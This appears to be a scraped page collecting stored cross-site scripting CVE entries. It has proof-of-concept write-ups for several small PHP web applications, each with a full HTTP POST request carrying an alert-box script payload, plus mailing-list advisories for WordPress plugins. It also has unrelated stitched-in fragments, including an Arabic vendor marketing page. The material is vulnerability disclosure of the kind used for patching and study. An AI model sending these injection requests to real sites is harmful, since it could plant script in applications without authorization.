A cross-site scripting vulnerability in the ads comment section of Haraj v3.7 allows attackers to execute arbitrary web scripts or HTML via a crafted POST request.

**CVE-2022-31298**

Haraj Script 3.7 - Authenticated Stored XSS

**Exploit Title: Haraj Script 3.7 - Authenticated Stored XSS****Date: 2022-06-13****CVE: CVE-2022-31298****Exploit Author: Abdulaziz Saad (@b4zb0z)****Vendor Homepage: https://angtech.org/****Software Link: https://angtech.org/product/view/3****Version: 3.7****Tested on: LAMP, Ubuntu**

\[#\] Exploitation : exploit ads comment section directly with js payload

CVE-2022-31298: GitHub - bigzooooz/CVE-2022-31298: Haraj Script 3.7 - Authenticated Stored XSS

Zoo Management System v1.0 is vulnerable to Cross Site Scripting (XSS) via zms/admin/public_html/save_animal?an_id=24.

Permalink

**zoo-management-system - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html

Date: 2022-05-07

Vulnerability File: /zms/admin/public\_html/save\_animal?an\_id=24

Vulnerability location: /zms/admin/public\_html/save\_animal?an\_id=24, an\_given\_name

\[+\] Payload: "><sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST http://192.168.2.102/zms/admin/public_html/save_animal?an_id=24 HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    Content-Type: multipart/form-data; boundary=---------------------------154827300217808672181041720663
    Content-Length: 4518
    Origin: http://192.168.2.102
    Connection: close
    Referer: http://192.168.2.102/zms/admin/public_html/save_animal?an_id=24
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    Upgrade-Insecure-Requests: 1
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="animal_id"
    
    24
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_given_name"
    
    	 "><sCrIpT>alert(1)</sCrIpT>
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_species_name"
    
    Acinonyx jubatus
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_dob"
    
    2020-04-04
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_gender"
    
    m
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_avg_lifespan"
    
    20 Years
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="class_id"
    
    1
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="location_id"
    
    4
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_dietary_req"
    
    Meat
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_natural_habitat"
    
    Grassland
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_pop_dist"
    
    20,000 in Asia
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_joindate"
    
    2020-04-11
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_height"
    
    12
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_weight"
    
    12
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_description"
    
    lorem ipsum dolor sit amet
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="images[]"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_med_record"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_transfer"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_transfer_reason"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_death_date"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_death_cause"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_incineration"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="m_gest_period"
    
    2 months
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="m_category"
    
    Clawed Mammal
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="m_avg_body_temp"
    
    34
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="b_nest_const"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="b_clutch_size"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="b_wingspan"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="b_color_variant"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="f_body_temp"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="f_water_type"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="f_color_variant"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="rep_type"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="clutch_size"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="num_offspring"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="submit"
    
    
    -----------------------------154827300217808672181041720663--

CVE-2022-31914: 0525/xss.md at main · mikeccltt/0525

Online Discussion Forum Site v1.0 is vulnerable to Cross Site Scripting (XSS) via /odfs/classes/Master.php?f=save_category, name.

Permalink

**online-discussion-forum-site - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /odfs/classes/Master.php

Vulnerability location: /odfs/classes/Master.php?f=save\_category, name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST http://192.168.2.102/odfs/classes/Master.php?f=save_category HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------1173846977850966238533383019
    Content-Length: 743
    Origin: http://192.168.2.102
    Connection: close
    Referer: http://192.168.2.102/odfs/admin/?page=categories
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    
    -----------------------------1173846977850966238533383019
    Content-Disposition: form-data; name="id"
    
    3
    -----------------------------1173846977850966238533383019
    Content-Disposition: form-data; name="name"
    
    <sCrIpT>alert(1)</sCrIpT>
    -----------------------------1173846977850966238533383019
    Content-Disposition: form-data; name="description"
    
    Python is a high-level, interpreted, general-purpose programming language. Its design philosophy emphasizes code readability with the use of significant indentation. Python is dynamically-typed and garbage-collected.
    -----------------------------1173846977850966238533383019
    Content-Disposition: form-data; name="status"
    
    1
    -----------------------------1173846977850966238533383019--

CVE-2022-31913: 0525/xss.md at main · mikeccltt/0525

Online Fire Reporting System v1.0 is vulnerable to Cross Site Scripting (XSS) via /ofrs/classes/Master.php.

Permalink

**online-fire-reporting-system - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /ofrs/classes/Master.php

Vulnerability location: /ofrs/classes/Master.php?f=save\_team, code

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST http://192.168.2.102/ofrs/classes/Master.php?f=save_team HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------12232441784418479012629232838
    Content-Length: 660
    Origin: http://192.168.2.102
    Connection: close
    Referer: http://192.168.2.102/ofrs/admin/?page=teams/manage_team&id=6
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="id"
    
    6
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="code"
    
    <sCrIpT>alert(1)</sCrIpT>
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="leader_name"
    
    asd
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="leader_contact"
    
    asd
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="members"
    
    asd
    -----------------------------12232441784418479012629232838--

CVE-2022-31906: 0525/xss.md at main · mikeccltt/0525

Online Tutor Portal Site v1.0 is vulnerable to Cross Site Scripting (XSS). via /otps/classes/Master.php.

Permalink

Cannot retrieve contributors at this time

**online-tutor-portal-site - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15339/online-tutor-portal-site-phpopp-free-source-code.html

Date: 2022-05-07

Vulnerability File: /otps/classes/Master.php

Vulnerability location: /otps/classes/Master.php?f=save\_course, name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST http://192.168.2.102/otps/classes/Master.php?f=save_course HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------23528694527160792041879147157
    Content-Length: 940
    Origin: http://192.168.2.102
    Connection: close
    Referer: http://192.168.2.102/otps/admin/?page=courses
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="id"
    
    6
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="tutor_id"
    
    4
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="name"
    
    <sCrIpT>alert(1)</sCrIpT>
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="description"
    
    Sample Course 102
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="experience"
    
    5
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="status"
    
    0
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------23528694527160792041879147157--

CVE-2022-31910: 0525/xss.md at main · mikeccltt/0525

A cross-site scripting vulnerability in the DM Section component of Haraj v3.7 allows attackers to execute arbitrary web scripts or HTML via a crafted POST request.

**اعمالنا في البرمجة**

**موقع حراج التميز لبيع الأغنام**

عرض

**موقع الجدير للتقييم المالي**

عرض

**اعمالنا في تحت التطوير**

**سكربت التذاكر NextTicket**

عرض

**سكربت الأنمي - NextAnime V1.0**

عرض

  
**خطوات الأشتراك**

**اختر الخدمة**

قم بأختيار الخدمات التى ترغب بها

**التسجيل بالموقع**

امتلك عضوية في الموقع وسجل دخولك

**اضف طلباتك**

اختر ما تريد في سلتك الخاصة

**سداد الفاتورة**

أختار ما يناسبك من وسائل الدفع

  

  
**آراء عملائنا الكرام**

Previous Next

:( شكراً لكم اخواني الله يعطيكم العافية شكرا جزيلا لكم وعلى سرعة ردكم بارك الله فيكم

"موقع حراجات"

الله يعطيك الف عافيه يارب ما قصرت

"حراج الخرج"

شكراً لكم على سرعة الرد والتعديل وايضاً التحديثات على السكربت

"حراج القطيف"

CVE-2022-31300: زوايا التقنية

This advisory contains mitigations for Improper Restriction of XML External Entity Reference, and Cross-site Scripting vulnerabilities in the Siemens Mendix SAML Module.

Siemens Mendix SAML Module

A vulnerability classified as problematic has been found in BestWebSoft Contact Form Plugin 4.0.0. This affects an unknown part. The manipulation leads to basic cross site scripting (Stored). It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.0.2 is able to address this issue. It is recommended to upgrade the affected component.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: Summer of Pwnage <lists () securify nl>  
_Date_: Wed, 1 Mar 2017 07:14:29 +0100  

\------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in Contact Form WordPress
Plugin
------------------------------------------------------------------------
Julien Rentrop, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A stored Cross-Site Scripting vulnerability was found in the Contact
Form WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0042

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Contact Form by BestWebSoft
WordPress Plugin version 4.0.0.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is partially resolved in Contact Form version 4.0.2.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/stored\_cross\_site\_scripting\_vulnerability\_in\_contact\_form\_wordpress\_plugin.html

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Stored Cross-Site Scripting vulnerability in Contact Form WordPress Plugin** _Summer of Pwnage (Feb 28)_

CVE-2017-20055: Stored Cross-Site Scripting vulnerability in Contact Form WordPress Plugin

A vulnerability was found in XYZScripts Contact Form Manager Plugin. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to basic cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: Summer of Pwnage <lists () securify nl>  
_Date_: Wed, 1 Mar 2017 07:13:59 +0100  

\------------------------------------------------------------------------
Cross-Site Request Forgery & Cross-Site Scripting in Contact Form
Manager WordPress Plugin
------------------------------------------------------------------------
Edwin Molenaar, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
 It was discovered that Contact Form Manager does not protect against
Cross-Site Request Forgery. This allows an attacker to change arbitrary
Contact Form Manager settings. In addtion, the plugin also fails to
apply proper output encoding, rendering it vulnerable to stored
Cross-Site Scripting.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160718-0003

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
These issues were successfully tested on Contact Form Manager WordPress
Plugin version

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross\_site\_request\_forgery\_\_\_cross\_site\_scripting\_in\_contact\_form\_manager\_wordpress\_plugin.html

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Cross-Site Request Forgery & Cross-Site Scripting in Contact Form Manager WordPress Plugin** _Summer of Pwnage (Feb 28)_

CVE-2017-20054: Cross-Site Request Forgery & Cross-Site Scripting in Contact Form Manager WordPress Plugin

A vulnerability was found in weblizar User Login Log Plugin 2.2.1. It has been classified as problematic. Affected is an unknown function. The manipulation leads to basic cross site scripting (Stored). It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: Summer of Pwnage <lists () securify nl>  
_Date_: Wed, 1 Mar 2017 07:13:27 +0100  

\------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in User Login Log WordPress
Plugin
------------------------------------------------------------------------
Axel Koolhaas, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A stored Cross-Site Scripting vulnerability was found in the User Login
Log WordPress Plugin. This issue can be exploited by Subscriber (or
higher) and allows an attacker to perform a wide variety of actions,
such as stealing users' session tokens, or performing arbitrary actions
on their behalf.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0011

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on User Login Log WordPress Plugin
version 2.2.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/stored\_cross\_site\_scripting\_vulnerability\_in\_user\_login\_log\_wordpress\_plugin.html

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Stored Cross-Site Scripting vulnerability in User Login Log WordPress Plugin** _Summer of Pwnage (Feb 28)_

Tag

#xss